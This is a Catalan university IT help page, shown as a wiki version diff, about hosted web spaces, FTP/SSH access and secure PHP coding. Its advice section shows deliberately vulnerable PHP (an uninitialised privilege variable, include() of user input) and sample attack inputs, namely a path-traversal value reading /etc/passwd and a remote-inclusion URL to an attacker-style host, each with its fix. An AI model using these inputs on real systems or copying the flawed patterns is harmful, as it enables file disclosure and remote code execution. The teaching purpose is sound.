Versions Compared

Old Version 71

changes.mady.by.user Julio Tena Fortanet

Saved on

compared with

New Version 72

changes.mady.by.user Toni Garcia

Saved on

Key

  • This line was added.
  • This line was removed.
  • Formatting was changed.

Status
titleIr a la versión en castellano

Table of Contents

...

Instruccions

...

Els avantatges principals d'usar aquest servei són:

  • Accés interactiu SSH.
  • Còpia automàtica (backup).
  • Diverses ferramentes a l'abast de tots els espais (sistema de prevenció d'atacs, accés interactiu, base de dades, plantilles, estadístiques, blocs i suport de diverses versions de PHP), llibreries i mòduls d'autentificació d'usuaris de la Universitat Jaume I, certificats per a servidors web segurs, etc. (Existeix la possibilitat de demanar altres ferramentes addicionals a aquestes, i, en cas de ser factible la seua instal·lació, es posarà a l'abast de tots els espais).
  • Opcionalment cada espai cedit pot disposar d'un bloc basat en el programari WordPress.
  • Utilitat per a canviar la clau d'accés de l'usuari ftp. A aquest mateix enllaç hi ha la possibilitat de canvi de contrasenya si no es recorda l'antiga.
  • Opcionalment un espai cedit pot disposar de certificat digital per tal de servir el contingut de forma segura entre l'espai cedit i el visitant. Per tal de sol.licitar aquesta característica haureu de tramitar-ho mijançant un CAU.

Compte FTP i Host Virtual

L'adreça que es facilita a l'espai cedit és un "Host Virtual" dins del domini de la Universitat Jaume I. Per la qual cosa, l'adreça definitiva d'accés a l'espai cedit serà la següent:
- http://<espai_cedit>.uji.es (on espai_cedit pot tindre la sintaxi 'http://www.nom.uji.es' o simplement 'http://nom.uji.es').

Les pàgines web hauran d'ubicar-se al directori "htdocs". L'adreça de connexió al servidor ftp, serà la mateixa que la de l'accés per navegador a l'espai cedit. Normalment:

- ftp://<espai_cedit>.uji.es

  • El nom del servidor  <espai_cedit>.uji.es
  • Port de conexió deixar en blanc
  • El nom d'usuari i la clau d'accés se subministra quan es demana l'espai cedit.
  • Si voleu canviar la clau d'accés subministrada polseu ací.
  • Qualsevol modificació sobre l'espai cedit (crear/eliminar base de dades, canviar Responsable o Persona de contacte, donar/eliminar accessos SSH, etc.) s'ha de comunicar desde el CAU, ho ha de fer el Responsable del site. No s'atendran si vénen de terceres persones.

Per a connectar-se per ftp us recomanem utilitzar el clients com ara FileZilla o WINSCP.

...

Info
titleModificacions permeses
  • Qualsevol modificació sobre l'espai cedit (crear/eliminar base de dades, canviar Responsable o Persona de contacte, donar/eliminar accessos SSH, etc.) s'ha de comunicar desde el CAU, ho ha de fer el Responsable del site. No s'atendran si vénen de terceres persones.
  • Si voleu canviar la clau d'accés subministrada polseu ací.

Accés al servidor

Cada espai cedit disposa d'accés interactiu i transmissió del contingut web (fulles estàtiques i programació) mijançant SSH.

  • Es recomana l'ús del programari putty per tal d'accedir interactivament.
  • Per tal de transmetre el contingut de la vostra web es recomana l'ús de fileZilla o WinSCP.
  • El nom de servidor que heu d'usar és mewtoo.uji.es o el nom de l'espai cedit.uji.es (sense http:// o https://).
  • Tant per accedir interactivament com per transmetre el contingut heu d'usar el port 22 típic d'SSH.
  • El protocol FTP es troba actiu encara que el servidor només estarà accessible desde la xarxa UJI, des de fora de la mateixa no serà possible connectar. Al respecte, el programari fileZilla haurà d'usar FTP explícit sota TLS.
  • Useu el nom d'usuari i clau d'accés subministrat amb l'espai cedit.

Execució del programari

Només es permet l'execució d'scripts en PHP (extensions .php, .php5), no es podran executar scripts en perl, python y/o shell script. Ací teniu uns exemples en aquest llenguatge de programació:

PHP ( http://www.php.net )
Quan programeu una aplicació web és molt recomanable seguir aquestes recomanacions. Es tracta de recomanacions per a PHP però són aplicables a qualsevol altre llenguatge de programació:

  • Initzialització de variables:

    És imprescindible inicialitzar cada variable que s'utlitze dins de l'script, per tal que no siga inicialitzada per tercers invocant la URL de l'script amb GET o POST. Es a dir, algun podria invocar l'script enviant-li un valor de la variable falç si coneix el nom de la mateixa. Considereu aquest fragment que no inicialitza la variable superusuario:

    Code Block
    languagephp
    <?php 
	if (comprueba_privilegios()){

...

  • $superusuario = true;

...

  • }

...

  • ... 
?>



  • Algú si coneix esta variable podria cridar l'script així http://www..uji.es/example.php?superusuario=true i convertir-se en superusuario. Aquest fragment ja soluciona la fallada de seguretat:

    Code Block
    <?php
	$superusuario = false;
	if (comprueba_privilegios()){
		$superusuario = true;
	}
	...
?>


  • Recollida dels valors: 

Les variables que arriben pel mètode GET, POST o COOKIE, normalment són enregistrades com variables globals, de forma que invocant-les directament ja tenim acces al seu valor. Esta és una forma de treballar no recomanable, ja que podem caure una altra vegada en un error similar al d'abans, amb la qual cosa, hauríem de recurrir a altres mètodes per recollir les variables, com ara $_GET['superusuario'] si ens arriba per GET, $_POST['superusuario'] si ens arriba per POST, $_COOKIE['superusuario'] si ens arriba en forma de cookie, o $_REQUEST['superusuario'], que és la forma universal d'accedir, siga quin siga el mètode.

  • Acces a arxius:

    Imaginem que tenim una variable $nom_usuari que conté el nom de l'usuari despres d'autenticar-se en algun lloc, i que volem carregar una salutació segons qui siga de la següent forma:

    Code Block
    <?php
	include ("/usr/local/lib/salutacions/$nom_usuari");
...


Alguna mala persona podria passar en el $nom_usuari el valor ../../../../etc/passwd o ../../algun/arxiu/secret/important.txt i accedir al contingut amb dades sensibles. Este cas es pot corregir usant la funció realpath($nom_usuari) la qual cosa elimina els .. indeseables. Un altre cas podria ser el del següent script que fa al mateix peró està codificat així:

Code Block
<?php
	chdir ("/usr/local/lib/salutacions");
	include ($nom_usuari);
	...
?>

La mateixa mala persona podria passar-li a l'script com a valor de $nom_usuari una URL amb codi PHP, per exemple:
- http://www.elmalo.com/codigo_malicioso.php
(http://www..uji.es/example.php nom_usuari=http://www.elmalo.com/codigo_malicioso.php), resultant en que el nostre script inclou el contingut de l'script remot i executant les sentències malignes. La solució passa per utilitzar les funcions realpath() o basename().

  • Altres: 

No useu dades proporcionats per l'usuari, normalment de formularis, com a paràmetres de funcions com eval(), preg_replace() amb l'opció /e, o comandos de sistema com ara exec(), system(), popen(), passthru() o l'operador `, ja que podria acabar executant en el sistema ordres no desitjades.

...